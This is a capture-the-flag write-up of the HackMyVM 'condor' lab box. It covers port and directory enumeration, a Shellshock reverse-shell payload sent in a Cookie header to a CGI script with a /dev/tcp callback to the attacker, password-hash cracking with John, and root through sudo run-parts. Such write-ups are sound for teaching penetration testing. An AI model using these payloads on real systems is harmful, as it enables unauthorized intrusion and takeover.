root💀muzec-sec:~#

Hack. Sleep. Repeat

View on GitHub

Enumeration With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -p- -oA nmap <Target-IP> -vv

# Nmap 7.91 scan initiated Mon Nov 15 09:37:32 2021 as: nmap -sC -sV -p- -oA nmap -vv 172.16.109.159
Nmap scan report for 172.16.109.159
Host is up, received syn-ack (0.00023s latency).
Scanned at 2021-11-15 09:37:33 WAT for 8s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 39:41:db:3a:f0:8f:7d:4d:85:c5:aa:0b:5f:66:ba:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDByhYIyiS98RS0gG4B16TAWtpKa+0kovSWt+UIipQR3wA0FJjLh47zpmGoP7HaEP7/0YNIrnrXMCEmQgOvl8T1nafWTaZ47YwkShQRX10leXka2l4naoYK9vFJIUahkM/Gjx8HgLjJu7xLKId1jffPhXSLU60TnBgGW/e7rqcNFB5Mz5cl/mFIraX0/81DZ40Ue+5ttxAT+4u9hbYoYy1MEyoRNQ0N3g6UPK26IHazF0xkLlxHqP7L4iLfnl5GjF18sVGg6vPYcSi/aTTyAKY85PhhBgcrRkOE0tqFXrznT84UX5Kz6EBHdS9Xlar4/q/JQCQYdC3s38XXrs32WwAY4eG1YYvuep6l26KYSaymGRpx3Nk3WltkqQlKM2bHq8jCWI9bL8vEf5UMSbsk/QRTrPf+blfXIokCYz2m+QFmDddPKQ24JYj/wAQ6z7qgl/MNrfC1CKyAbnnRkSE/pto8b7iJgOd7CkB3M28730/bRYHwZbJJNnJG1I/0jxDpj9k=
|   256 66:89:b1:8e:8b:af:cf:7f:49:c5:7c:e6:4b:b7:d8:5b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC4vXcAX0FuhBEcZk2KA5njtMpDJSpWAsddCggiHljbJ3/IjV5dkVX1cnBkMv9uB5dTaV+Qe0qVJPGCermYxHbw=
|   256 a3:b3:f0:14:a4:4e:05:c0:d1:24:2f:a8:fe:a5:2c:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINY9x5z6Jg3VUD13RTFE507JApanRMhT9wbDvDSWQN92
80/tcp open  http    syn-ack Apache httpd 2.4.51 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 15 09:37:42 2021 -- 1 IP address (1 host up) scanned in 9.43 seconds

PORTS

22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.51 ((Debian))

Interesting we have 2 open ports which is cool and easy i guess let start digging.

Enumeration On Port 80 HTTP

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/condor]
└─$ dirb http://172.16.109.159/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov 15 09:44:26 2021
URL_BASE: http://172.16.109.159/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.16.109.159/ ----
+ http://172.16.109.159/cgi-bin/ (CODE:403|SIZE:279)                                                                                                                  
+ http://172.16.109.159/index.php (CODE:200|SIZE:183)                                                                                                                 
+ http://172.16.109.159/server-status (CODE:403|SIZE:279)                                                                                                             
                                                                                                                                                                      
-----------------
END_TIME: Mon Nov 15 09:44:28 2021
DOWNLOADED: 4612 - FOUND: 3

A quick dirb directories bursting but got index.php and cgi-bin default i guess navigating to confirm it on browser.

image

Checking page source also i go nothing so i decided to burst more directories.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/condor]
└─$ gobuster dir -u http://172.16.109.159/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,phtml,html,txt,old,jpg,cgi,sh
===============================================================
Gobuster v3.1.0                                                                    
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.109.159/cgi-bin
[+] Method:                  GET                                                   
[+] Threads:                 10                                                    
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt
[+] Negative Status codes:   404                                                   
[+] User Agent:              gobuster/3.1.0    
[+] Extensions:              html,txt,old,jpg,cgi,sh,php,phtml
[+] Timeout:                 10s                                                   
===============================================================
2021/11/15 09:49:43 Starting gobuster in directory enumeration mode
===============================================================

image

/test.cgi (Status: 200) [Size: 20]

image

/condor.sh (Status: 200) [Size: 137]

Smooth now that is getting interesting we have 2 files with status 200 it possible we are dealing with shellshock or not so i decided to look up some CGI tricks.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/condor]
└─$ curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://172.16.109.159/cgi-bin/test.cgi 2>/dev/null| grep 'VULNERABLE'

But dead end got nothing hehehehehe we still have condor.sh to try let hit it.

image

curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/172.16.109.1/1337 0>&1' http://172.16.109.159/cgi-bin/condor.sh

Ncat listener ready running the payload and boom we got our shell now let spawn a TTY shell.

image

Now we have a strong and stable shell let enumerate more to move our Privilege to another user.

image

Nice now let cat it to see what we have.

image

Some hashes cool let feed it to john the ripper to see if it crackable or a rabbit hole lol.

┌──(muzec㉿Muzec-Security)-[~/Documents/HackMyVm/condor]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 29 password hashes with 29 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Remaining 27 password hashes with 27 different salts
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

image

I was able to crack two hashes which is cool i guess now let try it for both users.

Shell As Paulo

image

Boom i was able to get access with username:- paulo and password:- password123

Privilege Escalation

Time to get root checking sudo -l and seems we can run a command to get root .

User paulo may run the following commands on condor:
    (ALL : ALL) NOPASSWD: /usr/bin/run-parts

Nice so i look up gtfobins.

image

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo run-parts --new-session --regex '^sh$' /bin

image

We are root and done.

Helpful Resources

https://book.hacktricks.xyz/pentesting/pentesting-web/cgi

https://gtfobins.github.io/gtfobins/run-parts/#sudo

Greeting From Muzec



Back To Home